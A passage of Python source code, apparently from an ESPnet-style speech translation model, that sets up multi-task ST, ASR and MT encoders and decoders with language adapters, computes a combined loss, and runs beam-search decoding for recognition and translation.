        if (self.cross_src_from != "embedding" and self.cross_src) \
                and (not self.normalize_before):
            logging.warning('Resorting to cross_src_from == "embedding" '
                            'for cross attention at the source.')
        if (self.cross_self_from != "embedding" and self.cross_self) \
                and (not self.normalize_before):
            logging.warning('Resorting to cross_self_from == "embedding" '
                            'for cross attention at self.')
# Adapters
self.use_adapters = getattr(args, "use_adapters", False)
self.use_adapters_in_enc = getattr(args, "use_adapters_in_enc", False)
adapter_names = getattr(args, "adapters", None)
adapter_reduction_factor = getattr(args, "adapter_reduction_factor", None)
adapter_reduction_factor_enc = getattr(args, "adapter_reduction_factor_enc", adapter_reduction_factor)
use_adapters_for_asr = getattr(args, "use_adapters_for_asr", True)
adapter_before_src_attn = getattr(args, "adapter_before_src_attn", False)
adapter_after_mha = getattr(args, "adapter_after_mha", False)
use_shared_adapters = getattr(args, "use_shared_adapters", False)
use_shared_adapters_enc = getattr(args, "use_shared_adapters_enc", False)
# if self.use_adapters and not use_adapters_for_asr:
# assert not self.do_asr or \
# (self.do_asr and self.num_decoders != 1) or \
# (self.do_asr and not self.do_st) # for backward compatibility
if adapter_names:
if self.do_asr and not self.do_st:
adapter_names = [str(args.char_list_src.index(f'<2{l}>')) for l in adapter_names]
else:
adapter_names = [str(args.char_list_tgt.index(f'<2{l}>')) for l in adapter_names]
logging.info(f'| adapters = {adapter_names}')
if self.do_st or self.do_asr:
logging.info(f'Speech encoder')
self.encoder = Encoder(
idim=idim,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.eunits,
num_blocks=args.elayers,
input_layer=getattr(args, "transformer_input_layer", "conv2d"),
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
attention_dropout_rate=args.transformer_attn_dropout_rate,
adapter_names=adapter_names if self.use_adapters_in_enc else None,
reduction_factor=adapter_reduction_factor_enc,
adapter_after_mha=adapter_after_mha,
shared_adapters=use_shared_adapters_enc,
)
if self.do_st:
logging.info('ST decoder')
self.decoder = Decoder(
odim=odim_tgt,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
self_attention_dropout_rate=args.transformer_attn_dropout_rate,
src_attention_dropout_rate=args.transformer_attn_dropout_rate,
normalize_before=self.normalize_before,
cross_operator=self.cross_operator if self.cross_to_st else None,
cross_shared=self.cross_shared,
cross_weight_learnable=self.cross_weight_learnable,
cross_weight=self.cross_weight,
use_output_layer=True if (self.use_joint_dict or \
(self.do_st and not self.do_asr)) else False,
adapter_names=adapter_names,
reduction_factor=adapter_reduction_factor,
adapter_before_src_attn=adapter_before_src_attn,
adapter_after_mha=adapter_after_mha,
shared_adapters=use_shared_adapters,
)
if self.do_asr:
logging.info('ASR decoder')
self.decoder_asr = Decoder(
odim=odim_src,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
self_attention_dropout_rate=args.transformer_attn_dropout_rate,
src_attention_dropout_rate=args.transformer_attn_dropout_rate,
normalize_before=self.normalize_before,
cross_operator=self.cross_operator if self.cross_to_asr else None,
cross_shared=self.cross_shared,
cross_weight_learnable=self.cross_weight_learnable,
cross_weight=self.cross_weight,
use_output_layer=True if (self.use_joint_dict or \
(self.do_asr and not self.do_st)) else False,
adapter_names=adapter_names,
reduction_factor=adapter_reduction_factor,
adapter_before_src_attn=adapter_before_src_attn,
adapter_after_mha=adapter_after_mha,
shared_adapters=use_shared_adapters,
)
if self.num_decoders == 1 and self.do_st:
logging.info('*** Use shared decoders *** ')
self.decoder_asr = self.decoder
if not self.use_joint_dict and (self.do_st and self.do_asr):
self.output_layer = torch.nn.Linear(args.adim, odim_tgt)
self.output_layer_asr = torch.nn.Linear(args.adim, odim_src)
# submodule for MT task
if self.do_mt:
logging.info('MT encoder')
self.encoder_mt = Encoder(
idim=odim_src,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
input_layer='embed',
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
attention_dropout_rate=args.transformer_attn_dropout_rate,
padding_idx=0
)
if not self.do_st:
logging.info('MT decoder')
self.decoder_mt = Decoder(
odim=odim_tgt,
attention_dim=args.adim,
attention_heads=args.aheads,
linear_units=args.dunits,
num_blocks=args.dlayers,
dropout_rate=args.dropout_rate,
positional_dropout_rate=args.dropout_rate,
self_attention_dropout_rate=args.transformer_attn_dropout_rate,
src_attention_dropout_rate=args.transformer_attn_dropout_rate,
normalize_before=self.normalize_before,
use_output_layer=True,
)
self.reset_parameters(args) # place after the submodule initialization
if self.mtlalpha > 0.0:
self.ctc = CTC(odim_src, args.adim, args.dropout_rate,
ctc_type=args.ctc_type, reduce=True,
zero_infinity=True)
else:
self.ctc = None
if self.asr_weight > 0 and (args.report_cer or args.report_wer):
from espnet.nets.e2e_asr_common import ErrorCalculator
self.error_calculator = ErrorCalculator(args.char_list_src,
args.sym_space, args.sym_blank,
args.report_cer, args.report_wer)
elif self.do_mt and getattr(args, "report_bleu", False):
from espnet.nets.e2e_mt_common import ErrorCalculator
self.error_calculator = ErrorCalculator(args.char_list_tgt,
args.sym_space,
args.report_bleu)
else:
self.error_calculator = None
self.rnnlm = None
# criterion
if self.do_st:
self.criterion_st = LabelSmoothingLoss(self.odim_tgt, self.ignore_id, args.lsm_weight,
args.transformer_length_normalized_loss)
if self.do_asr:
self.criterion_asr = LabelSmoothingLoss(self.odim_src, self.ignore_id, args.lsm_weight,
args.transformer_length_normalized_loss)
if self.do_mt:
self.criterion_mt = LabelSmoothingLoss(self.odim_tgt, self.ignore_id, args.lsm_weight,
args.transformer_length_normalized_loss)
self.normalize_length = args.transformer_length_normalized_loss # for PPL
# Language embedding layer
if self.lang_tok == "encoder-pre-sum":
self.language_embeddings = build_embedding(self.langs_dict, self.idim,
padding_idx=self.pad)
logging.info(f'language_embeddings: {self.language_embeddings}')
        # Backward compatibility
if self.cross_operator:
if "sum" in self.cross_operator:
self.cross_operator = "sum"
if "concat" in self.cross_operator:
self.cross_operator = "concat"
def reset_parameters(self, args):
"""Initialize parameters."""
# initialize parameters
logging.info(f'Initialize parameters...')
initialize(self, args.transformer_init)
if self.mt_weight > 0:
logging.info(f'Initialize MT encoder and decoder...')
torch.nn.init.normal_(self.encoder_mt.embed[0].weight,
mean=0, std=args.adim ** -0.5)
torch.nn.init.constant_(self.encoder_mt.embed[0].weight[self.pad], 0)
torch.nn.init.normal_(self.decoder_mt.embed[0].weight,
mean=0, std=args.adim ** -0.5)
torch.nn.init.constant_(self.decoder_mt.embed[0].weight[self.pad], 0)
def forward(self, xs_pad, ilens, ys_pad, ys_pad_src):
"""E2E forward.
:param torch.Tensor xs_pad: batch of padded source sequences (B, Tmax, idim)
:param torch.Tensor ilens: batch of lengths of source sequences (B)
:param torch.Tensor ys_pad: batch of padded target sequences (B, Lmax)
        :param torch.Tensor ys_pad_src: batch of padded source-language transcription sequences (B, Lmax)
        :return: ctc loss value
:rtype: torch.Tensor
:return: attention loss value
:rtype: torch.Tensor
:return: accuracy in attention decoder
:rtype: float
"""
# 0. Extract target language ID
tgt_lang_ids, tgt_lang_ids_src = None, None
if self.do_st or self.do_mt:
if self.use_lid: # remove target language ID in the beginning
tgt_lang_ids = ys_pad[:, 0:1]
ys_pad = ys_pad[:, 1:]
ys_in_pad, ys_out_pad = add_sos_eos(ys_pad, self.sos_tgt, self.eos_tgt,
self.ignore_id) # bs x max_lens
if self.lang_tok == "decoder-pre" and self.lang_tok_mt != "pre-src":
ys_in_pad = torch.cat([tgt_lang_ids, ys_in_pad[:, 1:]], dim=1)
ys_mask = target_mask(ys_in_pad, self.ignore_id) # bs x max_lens x max_lens
if self.do_asr or self.do_mt:
if self.use_lid:
tgt_lang_ids_src = ys_pad_src[:, 0:1]
ys_pad_src = ys_pad_src[:, 1:]
ys_in_pad_src, ys_out_pad_src = add_sos_eos(ys_pad_src, self.sos_src, self.eos_src,
self.ignore_id) # bs x max_lens_src
if self.lang_tok == "decoder-pre" and self.lang_tok_mt != "pre-tgt": # _v2 for mt_model_tgt
ys_in_pad_src = torch.cat([tgt_lang_ids_src, ys_in_pad_src[:, 1:]], dim=1)
ys_mask_src = target_mask(ys_in_pad_src, self.ignore_id) # bs x max_lens_src x max_lens_src
if self.do_mt and not self.do_st:
ys_pad_src_mt = ys_in_pad_src[:, :max(ilens)] # for data parallel
ys_mask_src_mt = (~make_pad_mask(ilens.tolist())).to(ys_pad_src_mt.device).unsqueeze(-2)
# 1. forward encoder
if self.do_st or self.do_asr:
xs_pad = xs_pad[:, :max(ilens)] # for data parallel # bs x max_ilens x idim
if self.lang_tok == "encoder-pre-sum":
lang_embed = self.language_embeddings(tgt_lang_ids) # bs x 1 x idim
xs_pad = xs_pad + lang_embed
src_mask = (~make_pad_mask(ilens.tolist())).to(xs_pad.device).unsqueeze(-2) # bs x 1 x max_ilens
enc_lang_id, enc_lang_id_src = None, None
if self.use_adapters_in_enc:
if self.do_asr:
enc_lang_id_src = str(tgt_lang_ids_src[0].data.cpu().numpy()[0])
if self.do_st:
enc_lang_id = str(tgt_lang_ids[0].data.cpu().numpy()[0])
# forward pass
hs_pad, hs_mask = self.encoder(xs_pad, src_mask, enc_lang_id)
hs_pad_src, hs_mask_src = hs_pad, hs_mask
if self.use_adapters_in_enc and self.do_asr:
hs_pad_src, hs_mask_src = self.encoder(xs_pad, src_mask, enc_lang_id_src)
elif self.do_mt and not self.do_st:
hs_pad_mt, hs_mask_mt = self.encoder_mt(ys_pad_src_mt, ys_mask_src_mt)
else:
raise NotImplementedError
# 2. forward decoders
pred_pad, pred_pad_asr, pred_pad_mt = None, None, None
loss_att, loss_asr, loss_mt = 0.0, 0.0, 0.0
if self.do_st:
if self.cross_to_st:
if self.wait_k_asr > 0:
cross_mask = create_cross_mask(ys_in_pad, ys_in_pad_src,
self.ignore_id, wait_k_cross=self.wait_k_asr)
elif self.wait_k_st > 0:
cross_mask = create_cross_mask(ys_in_pad, ys_in_pad_src,
self.ignore_id, wait_k_cross=-self.wait_k_st)
else:
cross_mask = create_cross_mask(ys_in_pad, ys_in_pad_src,
self.ignore_id, wait_k_cross=0)
cross_input = self.decoder_asr.embed(ys_in_pad_src)
if (self.cross_src_from == "before-self" and self.cross_src) or \
(self.cross_self_from == "before-self" and self.cross_self):
cross_input = self.decoder_asr.decoders[0].norm1(cross_input)
pred_pad, pred_mask = self.decoder(ys_in_pad, ys_mask, hs_pad, hs_mask,
cross=cross_input, cross_mask=cross_mask,
cross_self=self.cross_self, cross_src=self.cross_src)
else:
pred_pad, pred_mask = self.decoder(ys_in_pad, ys_mask, hs_pad, hs_mask)
if not self.use_joint_dict and (self.do_st and self.do_asr):
pred_pad = self.output_layer(pred_pad)
self.pred_pad = pred_pad
# compute attention loss
loss_att = self.criterion_st(pred_pad, ys_out_pad)
# Multi-task w/ ASR
if self.do_asr:
if self.cross_to_asr:
if self.wait_k_asr > 0:
cross_mask = create_cross_mask(ys_in_pad_src, ys_in_pad,
self.ignore_id, wait_k_cross=-self.wait_k_asr)
elif self.wait_k_st > 0:
cross_mask = create_cross_mask(ys_in_pad_src, ys_in_pad,
self.ignore_id, wait_k_cross=self.wait_k_st)
else:
cross_mask = create_cross_mask(ys_in_pad_src, ys_in_pad,
self.ignore_id, wait_k_cross=0)
cross_input = self.decoder.embed(ys_in_pad)
if (self.cross_src_from == "before-self" and self.cross_src) or \
(self.cross_self_from == "before-self" and self.cross_self):
cross_input = self.decoder.decoders[0].norm1(cross_input)
pred_pad_asr, _ = self.decoder_asr(ys_in_pad_src, ys_mask_src, hs_pad_src, hs_mask_src,
cross=cross_input, cross_mask=cross_mask,
cross_self=self.cross_self, cross_src=self.cross_src)
else:
pred_pad_asr, _ = self.decoder_asr(ys_in_pad_src, ys_mask_src, hs_pad_src, hs_mask_src)
if not self.use_joint_dict and (self.do_st and self.do_asr):
pred_pad_asr = self.output_layer_asr(pred_pad_asr)
self.pred_pad_asr = pred_pad_asr
# compute loss
loss_asr = self.criterion_asr(pred_pad_asr, ys_out_pad_src)
# Multi-task w/ MT
if self.do_mt:
if self.do_st:
# forward MT encoder
ilens_mt = torch.sum(ys_pad_src != self.ignore_id, dim=1).cpu().numpy()
# NOTE: ys_pad_src is padded with -1
ys_src = [y[y != self.ignore_id] for y in ys_pad_src] # parse padded ys_src
ys_zero_pad_src = pad_list(ys_src, self.pad) # re-pad with zero
ys_zero_pad_src = ys_zero_pad_src[:, :max(ilens_mt)] # for data parallel
src_mask_mt = (~make_pad_mask(ilens_mt.tolist())).to(ys_zero_pad_src.device).unsqueeze(-2)
hs_pad_mt, hs_mask_mt = self.encoder_mt(ys_zero_pad_src, src_mask_mt)
# forward MT decoder
pred_pad_mt, _ = self.decoder(ys_in_pad, ys_mask, hs_pad_mt, hs_mask_mt)
# compute loss
loss_mt = self.criterion_st(pred_pad_mt, ys_out_pad)
else:
pred_pad_mt, pred_mask_mt = self.decoder_mt(ys_in_pad, ys_mask, hs_pad_mt, hs_mask_mt)
loss_mt = self.criterion_mt(pred_pad_mt, ys_out_pad)
# compute accuracy
self.acc = th_accuracy(pred_pad.view(-1, self.odim_tgt), ys_out_pad,
ignore_label=self.ignore_id) if pred_pad is not None else 0.0
self.acc_asr = th_accuracy(pred_pad_asr.view(-1, self.odim_src), ys_out_pad_src,
ignore_label=self.ignore_id) if pred_pad_asr is not None else 0.0
self.acc_mt = th_accuracy(pred_pad_mt.view(-1, self.odim_tgt), ys_out_pad,
ignore_label=self.ignore_id) if pred_pad_mt is not None else 0.0
# TODO(karita) show predicted text
# TODO(karita) calculate these stats
cer_ctc = None
if self.mtlalpha == 0.0 or self.asr_weight == 0:
loss_ctc = 0.0
else:
batch_size = xs_pad.size(0)
hs_len = hs_mask.view(batch_size, -1).sum(1)
loss_ctc = self.ctc(hs_pad.view(batch_size, -1, self.adim), hs_len, ys_pad_src)
if self.error_calculator is not None:
ys_hat = self.ctc.argmax(hs_pad.view(batch_size, -1, self.adim)).data
cer_ctc = self.error_calculator(ys_hat.cpu(), ys_pad_src.cpu(), is_ctc=True)
# 5. compute cer/wer
cer, wer = None, None # TODO(hirofumi0810): fix later
# if self.training or (self.asr_weight == 0 or self.mtlalpha == 1 or not (self.report_cer or self.report_wer)):
# cer, wer = None, None
# else:
# ys_hat = pred_pad.argmax(dim=-1)
# cer, wer = self.error_calculator(ys_hat.cpu(), ys_pad.cpu())
        # copied from e2e_asr
alpha = self.mtlalpha
self.loss = (1 - self.asr_weight - self.mt_weight) * loss_att + \
self.asr_weight * (alpha * loss_ctc + (1 - alpha) * loss_asr) + \
self.mt_weight * loss_mt
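        # Worked example with hypothetical values: asr_weight=0.3, mt_weight=0.2,
        # alpha=0.5, loss_att=2.0, loss_ctc=4.0, loss_asr=3.0, loss_mt=2.5 gives
        # loss = 0.5 * 2.0 + 0.3 * (0.5 * 4.0 + 0.5 * 3.0) + 0.2 * 2.5
        #      = 1.0 + 1.05 + 0.5 = 2.55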
loss_asr_data = float(alpha * loss_ctc + (1 - alpha) * loss_asr)
loss_mt_data = None if self.mt_weight == 0 else float(loss_mt)
loss_st_data = float(loss_att)
loss_data = float(self.loss)
# compute bleu and ppl for mt model
        if self.do_mt:
            if self.training or self.error_calculator is None:
                bleu = 0.0
            else:
                ys_hat_mt = pred_pad_mt.argmax(dim=-1)
                bleu = self.error_calculator(ys_hat_mt.cpu(), ys_out_pad.cpu())
if self.normalize_length:
self.ppl = np.exp(loss_data)
else:
ys_out_pad = ys_out_pad.view(-1)
ignore = ys_out_pad == self.ignore_id # (B,)
total = len(ys_out_pad) - ignore.sum().item()
self.ppl = np.exp(loss_data * ys_out_pad.size(0) / total)
if loss_data < CTC_LOSS_THRESHOLD and not math.isnan(loss_data):
if self.do_mt:
self.reporter.report(loss_data, self.acc_mt, self.ppl, bleu)
else:
self.reporter.report(loss_asr_data, loss_mt_data, loss_st_data,
self.acc_asr, self.acc_mt, self.acc,
cer_ctc, cer, wer, 0.0, # TODO(hirofumi0810): bleu
loss_data)
else:
logging.warning('loss (=%f) is not correct', loss_data)
return self.loss
def scorers(self):
"""Scorers."""
return dict(decoder=self.decoder)
def encode(self, x):
"""Encode source acoustic features.
:param ndarray x: source acoustic feature (T, D)
:return: encoder outputs
:rtype: torch.Tensor
"""
self.eval()
x = torch.as_tensor(x).unsqueeze(0)
if self.do_mt:
enc_output, _ = self.encoder_mt(x, None)
else:
enc_output, _ = self.encoder(x, None)
return enc_output.squeeze(0)
def recognize(self, x, recog_args, char_list=None, rnnlm=None, use_jit=False):
"""Recognize input speech.
        :param ndarray x: input acoustic feature (B, T, D) or (T, D)
        :param Namespace recog_args: argument Namespace containing options
:param list char_list: list of characters
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
enc_output = self.encode(x).unsqueeze(0)
if recog_args.ctc_weight > 0.0:
lpz = self.ctc.log_softmax(enc_output)
lpz = lpz.squeeze(0)
else:
lpz = None
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
        # search params
beam = recog_args.beam_size_asr
penalty = recog_args.penalty_asr
ctc_weight = recog_args.ctc_weight
        # prepare sos
y = self.sos_src
if self.use_lid and self.lang_tok == 'decoder-pre':
src_lang_id = '<2{}>'.format(recog_args.config.split('.')[-2].split('-')[0])
y = char_list.index(src_lang_id)
logging.info(f'src_lang_id: {src_lang_id} - y: {y}')
logging.info(f'y: {y}')
vy = h.new_zeros(1).long()
if recog_args.maxlenratio_asr == 0:
maxlen = h.shape[0]
else:
maxlen = max(1, int(recog_args.maxlenratio_asr * h.size(0)))
minlen = int(recog_args.minlenratio_asr * h.size(0))
logging.info('max output length: ' + str(maxlen))
logging.info('min output length: ' + str(minlen))
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
hyp = {'score': 0.0, 'yseq': [y]}
if lpz is not None:
import numpy
from espnet.nets.ctc_prefix_score import CTCPrefixScore
ctc_prefix_score = CTCPrefixScore(lpz.detach().numpy(), 0, self.eos_src, numpy)
hyp['ctc_state_prev'] = ctc_prefix_score.initial_state()
hyp['ctc_score_prev'] = 0.0
if ctc_weight != 1.0:
# pre-pruning based on attention scores
from espnet.nets.pytorch_backend.rnn.decoders import CTC_SCORING_RATIO
ctc_beam = min(lpz.shape[-1], int(beam * CTC_SCORING_RATIO))
else:
ctc_beam = lpz.shape[-1]
hyps = [hyp]
ended_hyps = []
traced_decoder = None
for i in six.moves.range(maxlen):
logging.debug('position ' + str(i))
hyps_best_kept = []
for hyp in hyps:
vy[0] = hyp['yseq'][i]
# get nbest local scores and their ids
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
# FIXME: jit does not match non-jit result
if use_jit:
if traced_decoder is None:
                        traced_decoder = torch.jit.trace(self.decoder_asr.forward_one_step,
                                                         (ys, ys_mask, enc_output))
local_att_scores = traced_decoder(ys, ys_mask, enc_output)[0]
else:
local_att_scores = self.decoder_asr.forward_one_step(ys, ys_mask, enc_output)[0]
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores = self.output_layer_asr(local_att_scores)
if rnnlm:
rnnlm_state, local_lm_scores = rnnlm.predict(hyp['rnnlm_prev'], vy)
local_scores = local_att_scores + recog_args.lm_weight * local_lm_scores
else:
local_scores = local_att_scores
if lpz is not None:
local_best_scores, local_best_ids = torch.topk(
local_att_scores, ctc_beam, dim=1)
ctc_scores, ctc_states = ctc_prefix_score(
hyp['yseq'], local_best_ids[0], hyp['ctc_state_prev'])
local_scores = \
(1.0 - ctc_weight) * local_att_scores[:, local_best_ids[0]] \
+ ctc_weight * torch.from_numpy(ctc_scores - hyp['ctc_score_prev'])
if rnnlm:
local_scores += recog_args.lm_weight * local_lm_scores[:, local_best_ids[0]]
local_best_scores, joint_best_ids = torch.topk(local_scores, beam, dim=1)
local_best_ids = local_best_ids[:, joint_best_ids[0]]
else:
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[0, j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids[0, j])
if rnnlm:
new_hyp['rnnlm_prev'] = rnnlm_state
if lpz is not None:
new_hyp['ctc_state_prev'] = ctc_states[joint_best_ids[0, j]]
new_hyp['ctc_score_prev'] = ctc_scores[joint_best_ids[0, j]]
# will be (2 x beam) hyps at most
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(
hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
# sort and get nbest
hyps = hyps_best_kept
            logging.debug('number of pruned hypotheses: ' + str(len(hyps)))
if char_list is not None:
logging.debug(
'best hypo: ' + ''.join([char_list[int(x)] for x in hyps[0]['yseq'][1:]]))
# add eos in the final loop to avoid that there are no ended hyps
if i == maxlen - 1:
                logging.info('adding <eos> at the last position in the loop')
for hyp in hyps:
hyp['yseq'].append(self.eos_src)
            # add ended hypotheses to a final list, and remove them from the current
            # hypotheses (otherwise the number of hyps can fall below the beam size)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == self.eos_src:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen:
hyp['score'] += (i + 1) * penalty
if rnnlm: # Word LM needs to add final <eos> score
hyp['score'] += recog_args.lm_weight * rnnlm.final(
hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and recog_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
break
hyps = remained_hyps
logging.debug(f'hyps remained: {hyps}')
if len(hyps) > 0:
                logging.info('remaining hypotheses: ' + str(len(hyps)))
else:
logging.info('no hypothesis. Finish decoding.')
break
if char_list is not None:
for hyp in hyps:
logging.info(
'hypo: ' + ''.join([char_list[int(x)] for x in hyp['yseq'][1:]]))
        logging.info('number of ended hypotheses: ' + str(len(ended_hyps)))
nbest_hyps = sorted(
ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), recog_args.nbest)]
        # check the number of hypotheses
        if len(nbest_hyps) == 0:
            logging.warning('there are no N-best results; performing recognition again with a smaller minlenratio.')
            # should copy because Namespace will be overwritten globally
recog_args = Namespace(**vars(recog_args))
recog_args.minlenratio = max(0.0, recog_args.minlenratio - 0.1)
return self.recognize(x, recog_args, char_list, rnnlm)
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps
def translate(self, x, trans_args, char_list=None, rnnlm=None, use_jit=False):
"""Translate input speech.
        :param ndarray x: input acoustic feature (B, T, D) or (T, D)
        :param Namespace trans_args: argument Namespace containing options
:param list char_list: list of characters
:param torch.nn.Module rnnlm: language model module
:return: N-best decoding results
:rtype: list
"""
        # prepare sos
if getattr(trans_args, "tgt_lang", False):
            if getattr(self, "replace_sos", False):
y = char_list.index(trans_args.tgt_lang)
else:
y = self.sos_tgt
if self.use_lid and self.lang_tok == 'decoder-pre':
if self.lang_tok_mt is None or self.lang_tok_mt == "pre-tgt":
tgt_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
src_lang_id = self.sos_src
y = char_list.index(tgt_lang_id)
elif self.lang_tok_mt == "pre-src":
tgt_lang_id = self.sos_tgt
src_lang_id = '<2{}>'.format(trans_args.config.split('.')[-2].split('-')[-1])
if self.do_mt:
if src_lang_id != self.sos_src:
src_lang_id = char_list.index(src_lang_id)
x[0].insert(0, src_lang_id)
logging.info(f'tgt_lang_id: {tgt_lang_id} - y: {y}')
logging.info(f'src_lang_id: {src_lang_id}')
logging.info('<sos> index: ' + str(y))
logging.info('<sos> mark: ' + char_list[y])
if self.do_mt:
x = to_device(self, torch.from_numpy(np.fromiter(map(int, x[0]), dtype=np.int64)))
xs_pad = x.unsqueeze(0)
enc_output = self.encode(x).unsqueeze(0)
h = enc_output.squeeze(0)
logging.info('input lengths: ' + str(h.size(0)))
        # search params
beam = trans_args.beam_size
penalty = trans_args.penalty
vy = h.new_zeros(1).long()
if trans_args.maxlenratio == 0:
maxlen = h.shape[0]
else:
# maxlen >= 1
maxlen = max(1, int(trans_args.maxlenratio * h.size(0)))
minlen = int(trans_args.minlenratio * h.size(0))
logging.info('max output length: ' + str(maxlen))
logging.info('min output length: ' + str(minlen))
# initialize hypothesis
if rnnlm:
hyp = {'score': 0.0, 'yseq': [y], 'rnnlm_prev': None}
else:
hyp = {'score': 0.0, 'yseq': [y]}
hyps = [hyp]
ended_hyps = []
traced_decoder = None
for i in six.moves.range(maxlen):
logging.debug('position ' + str(i))
hyps_best_kept = []
for hyp in hyps:
vy[0] = hyp['yseq'][i]
# get nbest local scores and their ids
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
# FIXME: jit does not match non-jit result
if use_jit:
if traced_decoder is None:
traced_decoder = torch.jit.trace(self.decoder.forward_one_step,
(ys, ys_mask, enc_output))
local_att_scores = traced_decoder(ys, ys_mask, enc_output)[0]
else:
if self.do_mt:
local_att_scores = self.decoder_mt.forward_one_step(ys, ys_mask, enc_output)[0]
else:
local_att_scores = self.decoder.forward_one_step(ys, ys_mask, enc_output)[0]
if not self.use_joint_dict and (self.do_st and self.do_asr):
local_att_scores = self.output_layer(local_att_scores)
if rnnlm:
rnnlm_state, local_lm_scores = rnnlm.predict(hyp['rnnlm_prev'], vy)
local_scores = local_att_scores + trans_args.lm_weight * local_lm_scores
else:
local_scores = local_att_scores
local_best_scores, local_best_ids = torch.topk(local_scores, beam, dim=1)
for j in six.moves.range(beam):
new_hyp = {}
new_hyp['score'] = hyp['score'] + float(local_best_scores[0, j])
new_hyp['yseq'] = [0] * (1 + len(hyp['yseq']))
new_hyp['yseq'][:len(hyp['yseq'])] = hyp['yseq']
new_hyp['yseq'][len(hyp['yseq'])] = int(local_best_ids[0, j])
if rnnlm:
new_hyp['rnnlm_prev'] = rnnlm_state
# will be (2 x beam) hyps at most
hyps_best_kept.append(new_hyp)
hyps_best_kept = sorted(
hyps_best_kept, key=lambda x: x['score'], reverse=True)[:beam]
# sort and get nbest
hyps = hyps_best_kept
            logging.debug('number of pruned hypotheses: ' + str(len(hyps)))
if char_list is not None:
logging.info(
'best hypo: ' + ''.join([char_list[int(x)] for x in hyps[0]['yseq'][1:]]))
# add eos in the final loop to avoid that there are no ended hyps
if i == maxlen - 1:
                logging.info('adding <eos> at the last position in the loop')
for hyp in hyps:
hyp['yseq'].append(self.eos_tgt)
            # add ended hypotheses to a final list, and remove them from the current
            # hypotheses (otherwise the number of hyps can fall below the beam size)
remained_hyps = []
for hyp in hyps:
if hyp['yseq'][-1] == self.eos_tgt:
# only store the sequence that has more than minlen outputs
# also add penalty
if len(hyp['yseq']) > minlen:
hyp['score'] += (i + 1) * penalty
if rnnlm: # Word LM needs to add final <eos> score
hyp['score'] += trans_args.lm_weight * rnnlm.final(
hyp['rnnlm_prev'])
ended_hyps.append(hyp)
else:
remained_hyps.append(hyp)
# end detection
if end_detect(ended_hyps, i) and trans_args.maxlenratio == 0.0:
logging.info('end detected at %d', i)
break
hyps = remained_hyps
if len(hyps) > 0:
                logging.debug('remaining hypotheses: ' + str(len(hyps)))
else:
logging.info('no hypothesis. Finish decoding.')
break
if char_list is not None:
for hyp in hyps:
logging.debug(
'hypo: ' + ''.join([char_list[int(x)] for x in hyp['yseq'][1:]]))
        logging.debug('number of ended hypotheses: ' + str(len(ended_hyps)))
nbest_hyps = sorted(
ended_hyps, key=lambda x: x['score'], reverse=True)[:min(len(ended_hyps), trans_args.nbest)]
        # check the number of hypotheses
        if len(nbest_hyps) == 0:
            logging.warning('there are no N-best results; performing translation again with a smaller minlenratio.')
            # should copy because Namespace will be overwritten globally
trans_args = Namespace(**vars(trans_args))
trans_args.minlenratio = max(0.0, trans_args.minlenratio - 0.1)
return self.translate(x, trans_args, char_list, rnnlm)
logging.info('total log probability: ' + str(nbest_hyps[0]['score']))
logging.info('normalized log probability: ' + str(nbest_hyps[0]['score'] / len(nbest_hyps[0]['yseq'])))
return nbest_hyps
    def update_hypothesis(self, i, beam, hyps, hyps_cross_candidates,
                          enc_output, eos_cross, decoder, decoder_cross=None, wait_k_cross=0):
hyps_best_kept = []
# For each ST hypothesis, we use the best ASR candidates as cross information
for hyp in hyps:
# get nbest local scores and their ids
ys_mask = subsequent_mask(i + 1).unsqueeze(0)
ys = torch.tensor(hyp['yseq']).unsqueeze(0)
# FIXME: jit does not match non-jit result
if decoder_cross is not None:
all_scores = []
for hyp_cross in hyps_cross_candidates:
                    if len(hyp_cross['yseq']) > 2:
                        # keep a finished cross hypothesis in step by repeating its final <eos>
                        if hyp_cross['yseq'][-1] == eos_cross and hyp_cross['yseq'][-2] == eos_cross:
                            hyp_cross['yseq'].append(eos_cross)
ys_cross = torch.tensor(hyp_cross['yseq']).unsqueeze(0)
y_cross = decoder_cross.embed(ys_cross)
if (self.cross_self_from == "before-self" and self.cross_self) or \
(self.cross_src_from == "before-self" and self.cross_src):
y_cross = decoder_cross.decoders[0].norm1(y_cross)
cross_mask = create_cross_mask(ys, ys_cross, self.ignore_id, wait_k_cross=wait_k_cross)
local_att_scores = decoder.forward_one_step(ys, ys_mask, enc_output,
cross=y_cross, cross_mask=cross_mask,
